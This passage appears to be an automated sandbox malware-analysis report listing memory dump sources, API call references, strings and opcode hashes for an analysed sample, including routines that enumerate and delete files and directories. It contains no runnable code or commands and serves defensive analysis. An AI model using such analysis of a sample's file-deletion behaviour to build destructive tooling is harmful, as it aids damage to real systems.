• API ID: EnvironmentVariable$ByteCharMultiWide
• String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
• API String ID: 2184640988-1666712896
• Opcode ID: 45285921c275070c670ca49d0546862358ccffd5776fb92ec22702d428bfbd5c
• Instruction ID: 598501061b3cb32723b8d8403b8ff954ea72d0f72569ef58444f4e190b8e6bee
• Opcode Fuzzy Hash: 45285921c275070c670ca49d0546862358ccffd5776fb92ec22702d428bfbd5c
• Instruction Fuzzy Hash: 7161F822B08B8245EB219FB6A47027967A9FF85BA4B448331EE2D537D5DF3EE405C300

APIs
Memory Dump Source
• Source File: 00000002.00000002.2448990282.00007FFD93BF1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFD93BF0000, based on PE: true
• Associated: 00000002.00000002.2448927188.00007FFD93BF0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2448990282.00007FFD93C52000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2448990282.00007FFD93C9E000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2448990282.00007FFD93CA2000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2448990282.00007FFD93CFB000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2448990282.00007FFD93D01000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2448990282.00007FFD93D04000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2450214722.00007FFD93D05000.00000080.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2450302164.00007FFD93D07000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93bf0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 00007A54619ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3493878592-0
                                                                                                                                                                                                                                    • Opcode ID: 00f1522312bfcd982374d2b7872c5ef4cc0ec29a30735505d4bf24cc2f66f2d8
                                                                                                                                                                                                                                    • Instruction ID: ba05b2482f18f0f329d17578cbfaa475c154be1a5745ed660d7061ac4258774f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00f1522312bfcd982374d2b7872c5ef4cc0ec29a30735505d4bf24cc2f66f2d8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C316172709A8186EB70AFA0E8A07ED7364FB84748F44503ADA8E57794DF38C648C714
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B6842B
                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684AE
                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684CD
                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684DB
                                                                                                                                                                                                                                    • FindClose.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684EC
                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684F5
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                    • String ID: %s\*
                                                                                                                                                                                                                                    • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                    • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                    • Instruction ID: cead5740d0fc8d511b4d287351b0d3642f872878ce8ae89d2c6b70e8d010f390
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9941C721A0E54280EA22BB28E4481BBE360FB66754FC40632D75D86A9CFFBCD549C714
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$FileFind$00007B222ErrorF020FirstLastNext
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3012744331-0
                                                                                                                                                                                                                                    • Opcode ID: 93d5875e5dee341f10784224bd53556331c46b81fbb66407b9d17040cc771b2d
                                                                                                                                                                                                                                    • Instruction ID: d824a4d1b6507703cf8d8b350cc4740b5b7495444347685c6ac1de6b7da16a36
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93d5875e5dee341f10784224bd53556331c46b81fbb66407b9d17040cc771b2d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DB1B522B04A8286EB318FA6D46427E77B8FB49BA4F448335DA5D53795EF3DE041C710
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 544d81e5d0bf66c33f804bb133da19342079062bac93336a06aa1597cb30c435
• Instruction ID: d4b03cbf2c94622581c57d09dc4c0be9f16de2c9af48431b27bbc777b31735d6
• Opcode Fuzzy Hash: 544d81e5d0bf66c33f804bb133da19342079062bac93336a06aa1597cb30c435
• Instruction Fuzzy Hash: 53314772708B818AEB709FE1E8A03EE7364FB84744F44813ADA4E57A99DF38D548C710
APIs
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
• Instruction ID: 813650037018439056f3b81bc7c901320c46dfa1dd6a3eb00dff68d4ea121cde
• Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
• Instruction Fuzzy Hash: B5315072609B8586EB619F64E8447EEB360FB95704F444039DB4D47B99EFB8C148C714
APIs
• _get_daylight.LIBCMT ref: 00007FF7B2B85C45
  • Part of subcall function 00007FF7B2B85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B855AC
  • Part of subcall function 00007FF7B2B7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
  • Part of subcall function 00007FF7B2B7A948: GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
  • Part of subcall function 00007FF7B2B7A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7B2B7A8DF,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7A909
  • Part of subcall function 00007FF7B2B7A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7B2B7A8DF,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7A92E
• _get_daylight.LIBCMT ref: 00007FF7B2B85C34
  • Part of subcall function 00007FF7B2B855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B8560C
• _get_daylight.LIBCMT ref: 00007FF7B2B85EAA
• _get_daylight.LIBCMT ref: 00007FF7B2B85EBB
• _get_daylight.LIBCMT ref: 00007FF7B2B85ECC
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7B2B8610C), ref: 00007FF7B2B85EF3
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID:
• API String ID: 4070488512-0
• Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
• Instruction ID: 080ee76178d6f77bf67e634cb9a1fc5aca53e6555820f28d494afc84c43a14ac
• Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
• Instruction Fuzzy Hash: 3BD11722A1A24245E722BF29C4445BBE791EF66784FC58039DB4D4B69EFFBCE441C720
APIs
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
• Instruction ID: bbd655453336a66547e5bc006f66ef3d1000e4163d73a65bd08ad38ee6804c87
• Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
• Instruction Fuzzy Hash: 8C319232609B8185DB61DF28E8442AFB3A4FB99754F940139EB8D47B69EF7CC145CB10
APIs
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
• Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
• Instruction ID: 13ccb4e757b9ffc75b4e9254fceb4d906dead93338128e98766b9dfeed2499e7
• Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
• Instruction Fuzzy Hash: E2B1CB21B2B68241EA52BB2DD4081BBE350EB66BE4F844135DB5D4B79DFEBCE441C320
APIs
• _get_daylight.LIBCMT ref: 00007FF7B2B85EAA
  • Part of subcall function 00007FF7B2B855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B8560C
• _get_daylight.LIBCMT ref: 00007FF7B2B85EBB
  • Part of subcall function 00007FF7B2B85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B855AC
• _get_daylight.LIBCMT ref: 00007FF7B2B85ECC
  • Part of subcall function 00007FF7B2B855C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B855DC
  • Part of subcall function 00007FF7B2B7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
  • Part of subcall function 00007FF7B2B7A948: GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7B2B8610C), ref: 00007FF7B2B85EF3
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
• Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
• Instruction ID: 1fc54b5876b81c746acc20289d48d64227c7635e6b9061996f4e4ec53b86d0e3
• Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E651E622A1924286E312FF29D4855ABF360FB6A744FC14139DB4D4B69AFFBCE400C760
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2448990282.00007FFD93BF1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFD93BF0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448927188.00007FFD93BF0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93C52000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93C9E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93CA2000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93CFB000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93D01000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93D04000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450214722.00007FFD93D05000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450302164.00007FFD93D07000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93bf0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 00007D941550
                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                    • API String ID: 2803101717-4108050209
                                                                                                                                                                                                                                    • Opcode ID: c0735b60b94bbddb0bae78b7479535f15170488d3e368e103155ebeef76c676e
                                                                                                                                                                                                                                    • Instruction ID: 8ad8aaa6a84d465bcb64b51447db3a5d59c384660caec4a3ff934069c0ac5bc9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0735b60b94bbddb0bae78b7479535f15170488d3e368e103155ebeef76c676e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30E1D272F0C55285EA74AB95D42867E73ADFB54748F142935EACEA2784DF3CE841CB00
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastbind
                                                                                                                                                                                                                                    • String ID: ..\s\crypto\bio\b_sock2.c
                                                                                                                                                                                                                                    • API String ID: 2328862993-3200932406
                                                                                                                                                                                                                                    • Opcode ID: 8475ffe534be1b52f8a83a963f2585e8110bc00f71c71f802b4263a764d0a002
                                                                                                                                                                                                                                    • Instruction ID: ba54a0986027afb3cae38868c26fbd23adbf3f14aa3eca88f2a549b76cce4b01
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8475ffe534be1b52f8a83a963f2585e8110bc00f71c71f802b4263a764d0a002
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE21A172B0855286E720DBE6E8202AE7368FB81B84F404631EA5C57BDADF3CE555CB00
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
